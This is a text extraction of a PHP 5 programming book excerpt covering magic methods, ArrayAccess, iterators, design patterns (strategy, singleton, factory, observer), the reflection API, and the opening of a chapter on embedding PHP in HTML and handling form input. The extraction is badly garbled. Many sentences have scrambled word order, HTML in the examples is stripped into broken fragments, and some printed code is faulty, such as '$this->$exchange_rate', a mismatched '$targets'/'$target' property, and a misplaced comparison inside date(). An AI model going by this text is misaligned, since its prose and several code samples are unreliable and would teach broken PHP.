111 Gutmans_ch03 Page 83 Thursday, September 23, 2004 2:38 PM 3.21 Summary 83 Following is the same example using class type hints: function onlyWantMyClassObjects(MyClass $obj) { // ... } When the function is called, PHP automatically performs an instan- ceof check before the function’s code starts executing. If it fails, it will instanceof check, it is legal to abort with an error. Because the check is an send any object that satisfies the is-a relationship with the class type. This feature is mainly useful during development, because it helps ensure that you aren’t passing objects to functions which weren’t designed to handle them. 3.21 S UMMARY This chapter covered the PHP 5 object model, including the concept of classes and objects, polymorphism, and other important object-oriented concepts and semantics. If you’re new to PHP but have written code in object-oriented lan- guages, you will probably not understand how people managed to write object- oriented code until now. If you’ve written object-oriented code in PHP 4, you were probably just dying for these new features.

112 Gutmans_ch03 Page 84 Thursday, September 23, 2004 2:38 PM

113 Gutmans_ch04 Page 85 Thursday, September 23, 2004 2:39 PM CHAPTER 4 PHP 5 Advanced OOP and Design Patterns “I made up the term ‘object-oriented,’ and I can tell you I didn’t have C++ in mind.”—Alan Kay, OOPSLA ’97 NTRODUCTION 4.1 I In this chapter, you learn how to use PHP’s more advanced object-oriented capabilities. When you finish reading this chapter, you will have learned Overloading capabilities that can be controlled from PHP code ☞ ☞ Using design patterns with PHP 5 ☞ The new reflection API C 4.2 O APABILITIES VERLOADING In PHP 5, extensions written in C can overload almost every aspect of the object syntax. It also allows PHP code to overload a limited subset that is most often needed. This section covers the overloading abilities that you can control from your PHP code. 4.2.1 Property and Method Overloading PHP allows overloading of property access and method calls by implementing special proxy methods that are invoked if the relevant property or method doesn’t exist. This gives you a lot of flexibility in intercepting these actions and defining your own functionality. You may implement the following method prototypes: function __get($property) function __set($property, $value) function __call($method, $args) 85

114 Gutmans_ch04 Page 86 Thursday, September 23, 2004 2:39 PM 86 PHP 5 Advanced OOP and Design Patterns Chap. 4 is passed the property’s name, and you should return a value. __get is passed the property’s name and its new value. __set is passed the method’s name and a numerically indexed array of __call the passed arguments starting from 0 for the first argument. The following example shows how to use the and functions __get __set ( is covered later in this book; it checks whether a key exists array_key_exists() in the specified array): class StrictCoordinateClass { private $arr = array('x' => NULL, 'y' => NULL); function __get($property) { if (array_key_exists($property, $this->arr)) { return $this->arr[$property]; } else { print "Error: Can't read a property other than x & y\n"; } } function __set($property, $value) { if (array_key_exists($property, $this->arr)) { $this->arr[$property] = $value; } else { print "Error: Can't write a property other than x & y\n"; } } } $obj = new StrictCoordinateClass(); $obj->x = 1; print $obj->x; print "\n"; $obj->n = 2; print $obj->n; The output is 1 Error: Can't write a property other than x & y Error: Can't read a property other than x & y As x exists in the object’s array, the setter and getter method handlers , both agrees to read/write the values. However, when accessing the property n returns and, therefore, the for reading and writing, false array_key_exists() error messages are reached.

115 Gutmans_ch04 Page 87 Thursday, September 23, 2004 2:39 PM 87 4.2 Overloading Capabilities can be used for a variety of purposes. The following example __call() shows how to create a delegation model, in which an instance of the class Hel- delegates all method calls to an instance of the loWorldDelegator HelloWorld class: class HelloWorld { function display($count) { for ($i = 0; $i < $count; $i++) { print "Hello, World\n"; } return $count; } } class HelloWorldDelegator { function __construct() { $this->obj = new HelloWorld(); } function __call($method, $args) { return call_user_func_array(array($this->obj , $method), $args); ➥ } private $obj; } $obj = new HelloWorldDelegator(); print $obj->display(3); This script’s output is Hello, World Hello, World Hello, World 3 to relay the function function allows The call_user_func_array() __call() call with its arguments to which prints out HelloWorld::display() "Hello, $count 3 (in this case, ) which is then three times. It then returns World\n" printed out. Not only can you relay the method call to a different object (or handle it in whatever way you want), but you can also return a value from __call() , just like a regular method.

116 Gutmans_ch04 Page 88 Thursday, September 23, 2004 2:39 PM PHP 5 Advanced OOP and Design Patterns Chap. 4 88 4.2.2 Overloading the Array Access Syntax It is common to have key/value mappings or, in other words, lookup dictionar- ies in your application framework. For this purpose, PHP supports associa- tive arrays that map either integer or string values to any other PHP value. This feature was covered in Chapter 2, “PHP 5 Basic Language,” and in case you forgot about it, here’s an example that looks up the user John’s social- security number using an associative array which holds this information: print "John's ID number is " . $userMap["John"]; Associative arrays are extremely convenient when you have all the infor- mation at hand. But consider a government office that has millions of people in its database; it just wouldn’t make sense to load the entire database into associative array just to look up one user. A possible alternative is $userMap the to write a method that will look up the user’s id number via a database call. The previous code would look something like the following: print "John's ID number is " . $db->FindIDNumber("John"); This example would work well, but many developers prefer the associa- tive array syntax to access key/value-like dictionaries. For this purpose, PHP 5 enables you to overload an object so that it can behave like an array. Basically, it would enable you to use the array syntax, but behind the scenes, a method written by you would be called, which would execute the relevant database call, returning the wanted value. It is really a matter of personal preference as to what method to use. Sometimes, it is nicer to use this overloading ability than the verbosity of call- ing a method, and it’s up to you to decide which method suits you best. To allow your class to overload the array syntax, it needs to implement the ArrayAccess interface (see Figure 4.1). interface ArrayAccess                   Fig. 4.1 ArrayAccess interface.

117 Gutmans_ch04 Page 89 Thursday, September 23, 2004 2:39 PM 4.3 Iterators 89 The following example shows how to use it. It is incomplete because the database methods themselves aren’t implemented: class UserToSocialSecurity implements ArrayAccess { private $db; // An object which includes database access methods function offsetExists($name) { return $this->db->userExists($name); } function offsetGet($name) { return $this->db->getUserId($name); } function offsetSet($name, $id) { $this->db->setUserId($name, $id); } function offsetUnset($name) { $this->db->removeUser($name); } } $userMap = new UserToSocialSecurity(); print "John's ID number is " . $userMap["John"]; You can see that the object is used just like an array, but behind $userMap the scenes, when the lookup is performed, the offsetGet() $userMap["John"] method. method is invoked, which in turn calls the database getUserId() TERATORS 4.3 I foreach() loop: The properties of an object can be iterated using the class MyClass { public $name = "John"; public $sex = "male"; } $obj = new MyClass(); foreach ($obj as $key => $value) {

118 Gutmans_ch04 Page 90 Thursday, September 23, 2004 2:39 PM PHP 5 Advanced OOP and Design Patterns Chap. 4 90 print "obj[$key] = $value\n"; } Running this script results in obj[name] = John obj[sex] = male However, often when you write object-oriented code, your classes don’t necessarily represent a simple key/value array as in the previous example, but represent more complex data, such as a database query or a configuration file. foreach() PHP 5 allows you to overload the behavior of the iteration from within your code so you can have it do what makes sense in respect to your class’s design. Note: Not only does PHP 5 enable you to overload this behavior, but it also allows extension authors to override such behavior, which has brought iterator support to various PHP extensions such as SimpleXML and SQLite. To overload iteration for your class kind, you need to adhere to certain interfaces that are pre-defined by the language (see Figure 4.2). interface Traversable interface Iterator interface     IteratorAggregate             Fig. 4.2 Class diagram of Iterator hierarchy.

119 Gutmans_ch04 Page 91 Thursday, September 23, 2004 2:39 PM 91 4.3 Iterators interface is a class that can be Any class that implements the Traversable is an empty traversed using the construct. However, foreach() Traversable interface that shouldn’t be implemented directly; instead, you should either implement . or that inherit from Iterator IteratorAggregate Traversable Iterator The main interface is . It defines the methods you need to imple- foreach() ment to give your classes the iteration capabilities. These methods should be public and are listed in the following table. Interface Iterator void rewind() Rewinds the iterator to the beginning of the list (this might not always be possible to implement). mixed current() Returns the value of the current position. mixed key() Returns the key of the current position. void next() Moves the iterator to the next key/value pair. bool valid() if there are more values (used before the call to Returns / true false or ). key() current() interface, it will be traversable If your class implements the Iterator . Here’s a simple example: with foreach() class NumberSquared implements Iterator { public function __construct($start, $end) { $this->start = $start; $this->end = $end; } public function rewind() { $this->cur = $this->start; } public function key() { return $this->cur; } public function current() { return pow($this->cur, 2); } public function next() { $this->cur++;

120 Gutmans_ch04 Page 92 Thursday, September 23, 2004 2:39 PM 92 PHP 5 Advanced OOP and Design Patterns Chap. 4 } public function valid() { return $this->cur <= $this->end; } private $start, $end; private $cur; } $obj = new NumberSquared(3, 7); foreach ($obj as $key => $value) { print "The square of $key is $value\n"; } The output is The square of 3 is 9 The square of 4 is 16 The square of 5 is 25 The square of 6 is 36 The square of 7 is 49 This example demonstrates how you can implement you own behavior for iterating a class. In this case, the class represents the square of integers, and after given a minimum and maximum value, iterating over those values will give you the number itself and its square. Now in many cases, your class itself will represent data and have meth- ods to interact with this data. The fact that it also requires an iterator might not be its main functionality. Also, when iterating an object, the state of the iteration (current position) is usually stored in the object itself, thus not allow- ing for nested iterations. For these two reasons, you may separate the imple- mentation of your class and its iterator by making your class implement the IteratorAggregate interface. Instead of having to define all the previous meth- ods, you need to define a method that returns an object of a different class, which implements the iteration scheme for your class. public method you need to implement is Iterator getIterator() The because it returns an iterator object that handles the iteration for this class. By using this method of separating between the class and its iterator, we can rewrite the previous example the following way: class NumberSquared implements IteratorAggregate { public function __construct($start, $end) { $this->start = $start; $this->end = $end; }

121 Gutmans_ch04 Page 93 Thursday, September 23, 2004 2:39 PM 4.3 Iterators 93 public function getIterator() { return new NumberSquaredIterator($this); } public function getStart() { return $this->start; } public function getEnd() { return $this->end; } private $start, $end; } class NumberSquaredIterator implements Iterator { function __construct($obj) { $this->obj = $obj; } public function rewind() { $this->cur = $this->obj->getStart(); } public function key() { return $this->cur; } public function current() { return pow($this->cur, 2); } public function next() { $this->cur++; } public function valid() { return $this->cur <= $this->obj->getEnd(); } private $cur; private $obj; }

122 Gutmans_ch04 Page 94 Thursday, September 23, 2004 2:39 PM 94 PHP 5 Advanced OOP and Design Patterns Chap. 4 $obj = new NumberSquared(3, 7); foreach ($obj as $key => $value) { print "The square of $key is $value\n"; } The output is the same as the previous example. You can clearly see that the interface enables you to separate your classes’ main IteratorAggregate functionality and the methods needed for iterating it into two independent entities. Choose whatever method suits the problem at hand. It really depends on the class and its functionality as to whether the iterator should be in a sepa- rate class. 4.4 D ATTERNS ESIGN P object–oriented (OO)? Some So, what exactly qualifies a language as being people believe that any language that has objects that encapsulate data and methods can be considered OO. Others would also include polymorphism via inheritance and access modifiers into the definition. The purists would proba- bly list dozens of pages of things they think an OO language must support, such as exceptions, method overloading, reflection, strict typing, and more. You can bet that none of these people would ever agree with each other because of the diversity of OOP languages, each of them good for certain tasks and not quite as good for others. However, what most people would agree with is that developing OO soft- ware is not only about the syntax and the language features but it is a state of mind. Although there are some professionally written programs in functional languages such as C (for example, PHP), people developing in OO languages tend to give the software design more of an emphasis. One reason might be the fact that OO languages tend to contain features that help in the design phase, but the main reason is probably cultural because the OO community has always put a lot of emphasis on good design. This chapter covers some of the more advanced OO techniques that are possible with PHP, including the implementation of some common design pat- terns that are easily adapted to PHP. When designing software, certain programming patterns repeat them- selves. Some of these have been addressed by the software design community and have been given accepted general solutions. These repeating problems are called design patterns . The advantage of knowing and using these patterns is not only to save time instead of reinventing the wheel, but also to give devel- opers a common language in software design. You’ll often hear software devel- opers say, “Let’s use a singleton pattern for this,” or “Let’s use a factory pattern for that.” Due to the importance of these patterns in today’s software develop- ment, this section covers some of these patterns.

123 Gutmans_ch04 Page 95 Thursday, September 23, 2004 2:39 PM 4.4 Design Patterns 95 4.4.1 Strategy Pattern The strategy pattern is typically used when your programmer’s algorithm should be interchangeable with different variations of the algorithm. For example, if you have code that creates an image, under certain circumstances, you might want to create JPEGs and under other circumstances, you might want to create GIF files. The strategy pattern is usually implemented by declaring an abstract base class with an algorithm method, which is then implemented by inheriting concrete classes. At some point in the code, it is decided what concrete strategy is relevant; it would then be instantiated and used wherever relevant. Our example shows how a download server can use a different file selec- tion strategy according to the web client accessing it. When creating the HTML with the download links, it will create download links to either .tar.gz files or .zip files according to the browser’s OS identification. Of course, this means that files need to be available in both formats on the server. For sim- plicity’s sake, assume that if the word “Win” exists in $_SERVER["HTTP_ USER_AGENT"] , we are dealing with a Windows system and want to create .zip links; otherwise, we are dealing with systems that prefer .tar.gz. In this example, we would have two strategies: the .tar.gz strategy and the .zip strategy, which is reflected as the following strategy hierarchy (see Figure 4.3). abstract class FileNamingStrategy     class class TarGzFileNamingStrategy ZipFileNamingStrategy       Strategy hierarchy. Fig. 4.3

124 Gutmans_ch04 Page 96 Thursday, September 23, 2004 2:39 PM 96 PHP 5 Advanced OOP and Design Patterns Chap. 4 The following code snippet should give you an idea of how to use such a strategy pattern: abstract class FileNamingStrategy { abstract function createLinkName($filename); } class ZipFileNamingStrategy extends FileNamingStrategy { function createLinkName($filename) { return "http://downloads.foo.bar/$filename.zip"; } } class TarGzFileNamingStrategy extends FileNamingStrategy { function createLinkName($filename) { return "http://downloads.foo.bar/$filename.tar.gz"; } } if (strstr($_SERVER["HTTP_USER_AGENT"], "Win")) { $fileNamingObj = new ZipFileNamingStrategy(); } else { $fileNamingObj = new TarGzFileNamingStrategy(); } $calc_filename = $fileNamingObj->createLinkName("Calc101"); $stat_filename = $fileNamingObj->createLinkName("Stat2000"); print <<The following is a list of great downloads<
A great calculator
The best statistics application

EOF; Accessing this script from a Windows system gives you the following HTML output:

The following is a list of great downloads<


A great calculator< ➥ a>
The best statistics ➥ application

125 Gutmans_ch04 Page 97 Thursday, September 23, 2004 2:39 PM 4.4 Design Patterns 97 The strategy pattern is often used with the factory pattern, which is Tip: described later in this section. The factory pattern selects the correct strategy. 4.4.2 Singleton Pattern singleton pattern The is probably one of the best-known design patterns. You have probably encountered many situations where you have an object that handles some centralized operation in your application, such as a logger object. In such cases, it is usually preferred for only one such application-wide instance to exist and for all application code to have the ability to access it. Specifically, in a logger object, you would want every place in the application that wants to print something to the log to have access to it, and let the cen- tralized logging mechanism handle the filtering of log messages according to log level settings. For this kind of situation, the singleton pattern exists. Making your class a singleton class is usually done by implementing a static class method getInstance() , which returns the only single instance of the class. The first time you call this method, it creates an instance, saves it in private static variable, and returns you the instance. The subsequent a times, it just returns you a handle to the already created instance. Here’s an example: class Logger { static function getInstance() { if (self::$instance == NULL) { self::$instance = new Logger(); } return self::$instance; } private function __construct() { } private function __clone() { } function Log($str) { // Take care of logging } static private $instance = NULL; } Logger::getInstance()->Log("Checkpoint");

126 Gutmans_ch04 Page 98 Thursday, September 23, 2004 2:39 PM 98 PHP 5 Advanced OOP and Design Patterns Chap. 4 Logger::getInstance() , which gives you The essence of this pattern is access to the logging object from anywhere in your application, whether it is from a function, a method, or the global scope. In this example, the constructor and clone methods are defined as pri- vate . This is done so that a developer can’t mistakenly create a second getIn- or Logger operators; therefore, class using the new instance of the clone is the only way to access the singleton class instance. stance() 4.4.3 Factory Pattern Polymorphism and the use of base class is really the center of OOP. However, at some stage, a concrete instance of the base class’s subclasses must be cre- . A ated. This is usually done using the factory pattern class has a Factory static method that receives some input and, according to that input, it decides what class instance to create (usually a subclass). Say that on your web site, different kinds of users can log in. Some are guests, some are regular customers, and others are administrators. In a com- mon scenario, you would have a base class User and have three subclasses: , GuestUser , and AdminUser . Likely User and its subclasses would CustomerUser contain methods to retrieve information about the user (for example, permis- sions on what they can access on the web site and their personal preferences). The best way for you to write your web application is to use the base class User as much as possible, so that the code would be generic and that it would be easy to add additional kinds of users when the need arises. User The following example shows a possible implementation for the four classes, and the UserFactory class that is used to create the correct user object according to the username: abstract class User { function __construct($name) { $this->name = $name; } function getName() { return $this->name; } // Permission methods function hasReadPermission() { return true; } function hasModifyPermission() { return false;

127 Gutmans_ch04 Page 99 Thursday, September 23, 2004 2:39 PM 4.4 Design Patterns 99 } function hasDeletePermission() { return false; } // Customization methods function wantsFlashInterface() { return true; } protected $name = NULL; } class GuestUser extends User { } class CustomerUser extends User { function hasModifyPermission() { return true; } } class AdminUser extends User { function hasModifyPermission() { return true; } function hasDeletePermission() { return true; } function wantsFlashInterface() { return false; } } class UserFactory { private static $users = array("Andi"=>"admin", "Stig"=>"guest", "Derick"=>"customer"); static function Create($name) { if (!isset(self::$users[$name])) { // Error out because the user doesn't exist } switch (self::$users[$name]) { case "guest": return new GuestUser($name);

128 Gutmans_ch04 Page 100 Thursday, September 23, 2004 2:39 PM 100 PHP 5 Advanced OOP and Design Patterns Chap. 4 case "customer": return new CustomerUser($name); case "admin": return new AdminUser($name); default: // Error out because the user kind doesn't exist } } } function boolToStr($b) { if ($b == true) { return "Yes\n"; } else { return "No\n"; } } function displayPermissions(User $obj) { print $obj->getName() . "'s permissions:\n"; print "Read: " . boolToStr($obj->hasReadPermission()); print "Modify: " . boolToStr($obj->hasModifyPermission()); print "Delete: " . boolToStr($obj->hasDeletePermission()); } function displayRequirements(User $obj) { if ($obj->wantsFlashInterface()) { print $obj->getName() . " requires Flash\n"; } } $logins = array("Andi", "Stig", "Derick"); foreach($logins as $login) { displayPermissions(UserFactory::Create($login)); displayRequirements(UserFactory::Create($login)); } Running this code outputs Andi's permissions: Read: Yes Modify: Yes Delete: Yes Stig's permissions: Read: Yes Modify: No Delete: No Stig requires Flash Derick's permissions: Read: Yes

129 Gutmans_ch04 Page 101 Thursday, September 23, 2004 2:39 PM 4.4 Design Patterns 101 Modify: Yes Delete: No Derick requires Flash This code snippet is a classic example of a factory pattern. You have a class User hierarchy), which your code such as hierarchy (in this case, the displayPer- treats identically. The only place where treatment of the classes dif- missions() fer is in the factory itself, which constructs these instances. In this example, the factory checks what kind of user the username belongs to and creates its class accordingly. In real life, instead of saving the user to user-kind mapping in a static array, you would probably save it in a database or a configuration file. Create() , you will often find other names used for the factory Besides Tip: . factoryMethod() , or createInstance() method, such as , factory() 4.4.4 Observer Pattern PHP applications, usually manipulate data. In many cases, changes to one piece of data can affect many different parts of your application’s code. For example, the price of each product item displayed on an e-commerce site in the customer’s local currency is affected by the current exchange rate. Now, assume that each product item is represented by a PHP object that most likely originates from a database; the exchange rate itself is most probably being taken from a different source and is not part of the item’s database entry. Let’s display() method that outputs the also assume that each such object has a HTML relevant to this product. observer pattern The allows for objects to register on certain events and/or data, and when such an event or change in data occurs, it is automati- cally notified. In this way, you could develop the product item to be an observer on the currency exchange rate, and before printing out the list of items, you could trigger an event that updates all the registered objects with the correct rate. Doing so gives the objects a chance to update themselves and take the new data into account in their display() method. Usually, the observer pattern is implemented using an interface called which the class that is interested in acting as an observer must Observer, implement. For example: interface Observer { function notify($obj); } register An object that wants to be “observable” usually has a method that allows the Observer object to register itself. For example, the following might be our exchange rate class:

130 Gutmans_ch04 Page 102 Thursday, September 23, 2004 2:39 PM 102 PHP 5 Advanced OOP and Design Patterns Chap. 4 class ExchangeRate { static private $instance = NULL; private $observers = array(); private $exchange_rate; private function ExchangeRate() { } static public function getInstance() { if (self::$instance == NULL) { self::$instance = new ExchangeRate(); } return self::$instance; } public function getExchangeRate() { return $this->$exchange_rate; } public function setExchangeRate($new_rate) { $this->$exchange_rate = $new_rate; $this->notifyObservers(); } public function registerObserver($obj) { $this->observers[] = $obj; } function notifyObservers() { foreach($this->observers as $obj) { $obj->notify($this); } } } class ProductItem implements Observer { public function __construct() { ExchangeRate::getInstance()->registerObserver($this); } public function notify($obj) { if ($obj instanceof ExchangeRate) { // Update exchange rate data print "Received update!\n"; } } } $product1 = new ProductItem(); $product2 = new ProductItem(); ExchangeRate::getInstance()->setExchangeRate(4.5);

131 Gutmans_ch04 Page 103 Thursday, September 23, 2004 2:39 PM 4.5 Reflection 103 This code prints Received update! Received update! class doesn’t do Although the example isn’t complete (the ProductItem setExchangeRate() method), anything useful), when the last line executes (the and $product2 are notified via their notify() methods with the both $product1 new exchange rate value, allowing them to recalculate their cost. This pattern can be used in many cases; specifically in web development, it can be used to create an infrastructure of objects representing data that , POST might be affected by cookies, GET , and other input variables. 4.5 R EFLECTION 4.5.1 Introduction reflection capabilities (also referred to as New to PHP 5 are its introspec- tion ). These features enable you to gather information about your script at runtime; specifically, you can examine your functions, classes, and more. It also enables you to access such language objects by using the available meta- data. In many cases, the fact that PHP enables you to call functions indirectly ) or instantiate classes directly (new $classname(...) ) is suffi- (using $func(...) cient. However, in this section, you see that the provided reflection API is more powerful and gives you a rich set of tools to work directly with your applica- tion. 4.5.2 Reflection API The reflection API consists of numerous classes that you can use to introspect your application.The following is a list of these items. The next section gives examples of how to use them. interface Reflector static export(...) class ReflectionFunction implements Reflector __construct(string $name) string __toString() static mixed export(string $name [,bool $return = false]) bool isInternal() bool isUserDefined() string getName() string getFileName() int getStartLine()

132 Gutmans_ch04 Page 104 Thursday, September 23, 2004 2:39 PM 104 PHP 5 Advanced OOP and Design Patterns Chap. 4 int getEndLine() string getDocComment() mixed[] getStaticVariables() mixed invoke(mixed arg0, mixed arg1, ...) bool returnsReference() ReflectionParameter[] getParameters() class ReflectionMethod extends ReflectionFunction implements ➥ Reflector bool isPublic() bool isPrivate() bool isProtected() bool isAbstract() bool isFinal() bool isStatic() bool isConstructor() bool isDestructor() int getModifiers() ReflectionClass getDeclaringClass() class ReflectionClass implements Reflector string __toString() static mixed export(string $name [,bool $return = false]) string getName() bool isInternal() bool isUserDefined() bool isInstantiable() string getFileName() int getStartLine() int getEndLine() string getDocComment() ReflectionMethod getConstructor() ReflectionMethod getMethod(string $name) ReflectionMethod[] getMethods(int $filter) ReflectionProperty getProperty(string $name) ReflectionProperty[] getProperties(int $filter) mixed[] getConstants() mixed getConstant(string $name) ReflectionClass[] getInterfaces() bool isInterface() bool isAbstract() bool isFinal() int getModifiers() bool isInstance($obj) object newInstance(mixed arg0, arg1, ...) ReflectionClass getParentClass() bool isSubclassOf(string $class) bool isSubclassOf(ReflectionClass $class) mixed[] getStaticProperties() mixed[] getDefaultProperties() bool isIterateable() bool implementsInterface(string $ifc) bool implementsInterface(ReflectionClass $ifc)

133 Gutmans_ch04 Page 105 Thursday, September 23, 2004 2:39 PM 4.5 Reflection 105 ReflectionExtension getExtension() string getExtensionName() class ReflectionParameter implements Reflector static mixed export(mixed func, int/string $param [,bool $return = false]) ➥ __construct(mixed func, int/string $param [,bool $return = false]) string __toString() string getName() bool isPassedByReference() ReflectionClass getClass() bool allowsNull() class ReflectionExtension implements Reflector static export(string $ext [,bool $return = false]) __construct(string $name) string __toString() string getName() string getVersion() ReflectionFunction[] getFunctions() mixed[] getConstants() mixed[] getINIEntries() ReflectionClass[] getClasses() String[] getClassNames() class ReflectionProperty implements Reflector static export(string/object $class, string $name, [,bool $return = false]) ➥ __construct(string/object $class, string $name) string getName() mixed getValue($object) setValue($object, mixed $value) bool isPublic() bool isPrivate() bool isProtected() bool isStatic() bool isDefault() int getModifiers() ReflectionClass getDeclaringClass() class Reflection static mixed export(Reflector $r [, bool $return = 0]) static array getModifierNames(int $modifier_value) class ReflectionException extends Exception

134 Gutmans_ch04 Page 106 Thursday, September 23, 2004 2:39 PM 106 PHP 5 Advanced OOP and Design Patterns Chap. 4 4.5.3 Reflection Examples As you may have noticed, the reflection API is extremely rich and allows you to retrieve a large amount of information from your scripts. There are many situations where reflection could come in handy, and realizing this potential requires you to play around with the API on your own and use your imagina- tion. In the meanwhile, we demonstrate two different ways you can use the reflection API. One is to give you runtime information of a PHP class (in this case an intrernal class), and the second is to implement a delegation model using the reflection API. 4.5.3.1 Simple Example The following code shows a simple example of using the ReflectionClass::export() static method to extract information about the class ReflectionParameter . It can be used to extract information of any PHP class: ReflectionClass::export("ReflectionParameter"); The result is Class [ class ReflectionProperty implements Reflector ] { - Constants [0] { } - Static properties [0] { } - Static methods [1] { Method [ static public method export ] { } } - Properties [0] { } - Methods [13] { Method [ final private method __clone ] { } Method [ public method __construct ] { } Method [ public method __toString ] { } Method [ public method getName ] { }

135 Gutmans_ch04 Page 107 Thursday, September 23, 2004 2:39 PM 4.5 Reflection 107 Method [ public method getValue ] { } Method [ public method setValue ] { } Method [ public method isPublic ] { } Method [ public method isPrivate ] { } Method [ public method isProtected ] { } Method [ public method isStatic ] { } Method [ public method isDefault ] { } Method [ public method getModifiers ] { } Method [ public method getDeclaringClass ] { } } } As you can see, this function lists all necessary information about the class, such as methods and their signatures, properties, and constants. 4.5.4 Implementing the Delegation Pattern Using Reflection Times arise where a class ( ) is supposed to do everything another class ( Two ) One One to extend does and more. The preliminary temptation would be for class class Two , and thereby inheriting all of its functionality. However, there are times when this is the wrong thing to do, either because there isn’t a clear semantic is-a relationship between classes and Two , or class One is already One extending another class, and inheritance cannot be used. Under such circum- delegation design pat- stances, it is useful to use a delegation model (via the ), where method calls that class tern can’t handle are redirected to class One . In some cases, you may even want to chain a larger number of objects Two where the first one in the list has highest priority. ClassOneDelegator The following example creates such a delegator called that first checks if the method exists and is accessible in ClassOne ; if not, it tries all other objects that are registered with it. The application can register

136 Gutmans_ch04 Page 108 Thursday, September 23, 2004 2:39 PM 108 PHP 5 Advanced OOP and Design Patterns Chap. 4 addObject($obj) additional objects that should be delegated to by using the method. The order of adding the objects is the order of precedence when Class searches for an object that can satisfy the request: OneDelegator class ClassOne { function callClassOne() { print "In Class One\n"; } } class ClassTwo { function callClassTwo() { print "In Class Two\n"; } } class ClassOneDelegator { private $targets; function __construct() { $this->target[] = new ClassOne(); } function addObject($obj) { $this->target[] = $obj; } function __call($name, $args) { foreach ($this->target as $obj) { $r = new ReflectionClass($obj); if ($method = $r->getMethod($name)) { if ($method->isPublic() && !$method->isAbstract()) { return $method->invoke($obj, $args); } } } } } $obj = new ClassOneDelegator(); $obj->addObject(new ClassTwo()); $obj->callClassOne(); $obj->callClassTwo(); Running this code results in the following output: In Class One In Class Two

137 Gutmans_ch04 Page 109 Thursday, September 23, 2004 2:39 PM 4.6 Summary 109 You can see that this example uses the previously described feature of overloading method calls using the special __call() method. After the call is uses the reflection API to search for an object that can __call() intercepted, satisfy the request. Such an object is defined as an object that has a method with the same name, which is publicly accessible and is not an abstract method. Currently, the code does nothing if no satisfying function is found. You may want to call ClassOne by default, so that you make PHP error out with a ClassOne has itself defined a __call() nice error message, and in case method, it would be called. It is up to you to implement the default case in a way that suits your needs. 4.6 S UMMARY This chapter covered the more advanced object-oriented features of PHP, many of which are critical when implementing large-scale OO applications. Thanks to the advances of PHP 5, using common OO methodologies, such as design patterns, has now become more of a reality than with past PHP ver- sions. For further reading, we recommend additional material on design pat- terns and OO methodology. A good starting point is www.cetus-links.org, which keeps an up-to-date list of good starting points. Also, we highly recom- mend reading the classic book Design Patterns: Elements of Reusable Object- Oriented Software by Erich Gamma, Richard Helm, Ralph Johnson, and John M. Vlissides.

138 Gutmans_ch04 Page 110 Thursday, September 23, 2004 2:39 PM

139 Gutmans_ch05 Page 111 Thursday, September 23, 2004 2:41 PM CHAPTER 5 How to Write a Web Application with PHP “The ultimate security is your understanding of reality.”—H. Stanley Judd NTRODUCTION 5.1 I The most common use for PHP is building web sites. PHP makes web applica- tions dynamic, enabling users to interact with the site. The web application collects information from the user by means of HTML forms and processes it. Some of the information collected from users and stored at the web site is sen- sitive information, making security a major issue. PHP provides features that enable you to collect information from the user and to secure the information. It’s up to you to develop a complete application using the pieces provided by PHP. This chapter describes how to use the functionality of PHP to build a dynamic web application. After you finish reading this chapter, you will have learned ☞ How to embed PHP into HTML files How to collect information from web page visitors using HTML forms ☞ Some techniques used to attack web sites and how to protect against ☞ them ☞ How to handle errors in user input Two methods for making data persistent throughout your application: ☞ cookies and sessions How to collect data files from users via HTML forms ☞ ☞ How to organize your web application 111

140 Gutmans_ch05 Page 112 Thursday, September 23, 2004 2:41 PM 112 How to Write a Web Application with PHP Chap. 5 MBEDDING INTO HTML 5.2 E PHP doesn’t have to be embedded in an HTML file, of course; you can create a PHP file that includes no HTML. However, when building a web application, you often use PHP and HTML together in a file. PHP was developed primarily for web use, to be embedded in HTML files as a templating language. When PHP code is included in a file, the file is given the PHP extension (the exten- sion that signals your web server to expect PHP code in the file); usually .php, but a different extension(s), such as .phtml or .php5, can be specified when you configure your web server. The following code shows PHP embedded in HTML: Example 1 Jerry Seinfeld'; } else { echo 'Good morning!'; } ?> line When the text is so simple, the echo statements are acceptable. However, when you need to echo text strings that contain single or double quotes, the code becomes more complicated. If the text to be echoed in the example was a link ), the example would not have worked cor- rectly because the single quotes in the text would conflict with the single quotes enclosing the text string. For such a case, the PHP section can be ended before if the text needs to be output and begin again before the PHP code that ends the bock is needed, as in the following example: block and starts the else Example 2 Jerry Seinfeld '; ➥

141 Gutmans_ch05 Page 113 Thursday, September 23, 2004 2:41 PM 113 5.2 Embedding into HTML } else { echo 'Good morning!'; } ?> This coding behavior is messy. You are violating one of the principles of programming: “Separate logic from content.” The following version of embed- ding stores the text in a variable and then echoes the variable: < ?php /* If it is April 1st, we show a quote */ if (date('md' == '0401')) { $greeting = 'A bookstore is one of the only pieces of '. 'evidence we have that people are still thinking. '. 'Jerry Seinfeld'; } else { $greeting = 'Good morning!'; } ?> Example 3 Example 4

142 Gutmans_ch05 Page 114 Thursday, September 23, 2004 2:41 PM 114 How to Write a Web Application with PHP Chap. 5 If you want to be sure your application can run on as many systems as possible, you should not rely on short tags because they might be turned off. The rest of the examples in this chapter use the non-short tags everywhere. We also cover some additional techniques for separating code and layout. I 5.3 U SER NPUT Now that you know how to embed PHP code, you probably want to program some kind of user-specified action. For instance, the book webshop needs a login and registration system that requires user action, so we will implement this system as an example. This system requires an HTML form and a place to store the data collected by the form. Because this chapter does not deal with storing data in a database, only an API function is provided when data needs to be stored. After reading some of the later chapters, you will be able to fill these in yourself. We require four things from the user when he or she registers for the shop: email address, first name, last name, and requested password. The HTML code for a form to collect this information looks like this: Register

Registration

E-mail address:
First name:
Last name:
Password:

143 Gutmans_ch05 Page 115 Thursday, September 23, 2004 2:41 PM 115 5.3 User Input The lines that handle the form data are highlighted in bold. The form tag . We specify is the first bold line:

for the first attribute in the form tag—the method attribute. The HTTP get method encodes the form data in the URL, making it visible in the browser GET address window and making it possible to bookmark the result of the form. Another possible method is the method. Because we use some sensitive POST data (requested password), we are better off using the method. The POST POST method encodes the form data in the body of the HTTP request so that the data is not shown in the URL and cannot be bookmarked. built-in array to The script that processes the form data can use the $_GET method and the built-in process data from a form that uses the GET $_POST POST array for data from a form that uses the method. If you want to use both $_REQUEST $_GET $_POST and for some postings, you can use , which contains all $_GET $_COOKIE $_POST elements merged into one array. If the same ele- , and , php.ini variables_order ment exists in more than one array, the setting in the G file determines which element has precedence. In this configuration setting, $_GET $_POST P C represents , , E represents $_ENV , $_COOKIE , represents represents S represents . Variables are added to $_REQUEST in the order speci- and $_SERVER setting. Variables added later override variables variables_order fied by the , EGPCS with the same name that were added earlier. The default setting is POST GET variables with the same name. which means that variables override The 